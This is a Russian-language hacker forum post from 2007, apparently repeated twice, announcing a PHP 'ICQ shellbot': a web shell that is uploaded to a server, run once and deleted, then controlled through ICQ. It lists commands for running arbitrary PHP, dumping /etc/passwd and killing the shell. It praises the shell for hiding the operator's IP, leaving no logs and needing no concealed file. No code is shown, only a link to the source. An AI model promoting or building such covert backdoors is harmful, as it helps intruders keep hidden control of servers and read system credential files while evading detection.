nc.STRIEM
01.03.2007, 01:58
Недавно появилась идея написать PHP шел, который будет управляться через ICQ.
Собсно вот: PHP ICQSHELLBOT v1.1 (http://striem.narod.ru/shellbot.txt) [обновлен: 01.03.07 22:00]
Он еще ооочень сырой, и выступает в качестве тестовой версии, далее если возникнет необходимость - будет модифицирован.
Ну терь пару слов о самом шелле:
За основу взят ICQ класс mlCQ. Все управление осуществляется через ICQ. при заливки шелла на хост, его достаточно запустить 1 раз, при этом включается бот (на номере Аси которую вы ввели) и сам исходник можно смело удалять. Вобщем то после этого ваша ICQ начинает представлять из себя командную строку на удаленном сервере. Перед началом управления ботом необходима авторизация (пароль вы изначально указываете в исходнике). Также существует список встроенных команд, все они начинаются с @ :
@server - выводит информацию о сервере
@dir – информация о текущей директории (для каждого пользователя –uin шелл запоминает директорию)
@eval – выполнение произвольного PHP кода
@users – показует пользователей шелла
@passwd - содержимое /etc/passwd
@exit – выход пользователя
@kill – убийство шелла
@help – no comment
@about – no comment
Плюсы шелла:
- не палиться IP
- Не ведутся логии
- Не нужно прятать файл (т.к. его можно сразу удалить)
Минусы:
- Сервак должен поддерживать сокеты
- Сервер должен стабильно работать (т.к. при не стабильной работе бот вылетит, и прийдеться заливать заново)
- Палиться 5190 порт
- Вес 60kb (в дальнейшем если будет нужно можно облегчить почистив класс, ща просто влом)
Вобщем интересно будет послушать мнение народа.
P.S. Информация дана больше для размышления как о возможном варианте, а не как руководство к действию.
Собсно вот: PHP ICQSHELLBOT v1.1 (http://striem.narod.ru/shellbot.txt) [обновлен: 01.03.07 22:00]
Он еще ооочень сырой, и выступает в качестве тестовой версии, далее если возникнет необходимость - будет модифицирован.
Ну терь пару слов о самом шелле:
За основу взят ICQ класс mlCQ. Все управление осуществляется через ICQ. при заливки шелла на хост, его достаточно запустить 1 раз, при этом включается бот (на номере Аси которую вы ввели) и сам исходник можно смело удалять. Вобщем то после этого ваша ICQ начинает представлять из себя командную строку на удаленном сервере. Перед началом управления ботом необходима авторизация (пароль вы изначально указываете в исходнике). Также существует список встроенных команд, все они начинаются с @ :
@server - выводит информацию о сервере
@dir – информация о текущей директории (для каждого пользователя –uin шелл запоминает директорию)
@eval – выполнение произвольного PHP кода
@users – показует пользователей шелла
@passwd - содержимое /etc/passwd
@exit – выход пользователя
@kill – убийство шелла
@help – no comment
@about – no comment
Плюсы шелла:
- не палиться IP
- Не ведутся логии
- Не нужно прятать файл (т.к. его можно сразу удалить)
Минусы:
- Сервак должен поддерживать сокеты
- Сервер должен стабильно работать (т.к. при не стабильной работе бот вылетит, и прийдеться заливать заново)
- Палиться 5190 порт
- Вес 60kb (в дальнейшем если будет нужно можно облегчить почистив класс, ща просто влом)
Вобщем интересно будет послушать мнение народа.
P.S. Информация дана больше для размышления как о возможном варианте, а не как руководство к действию.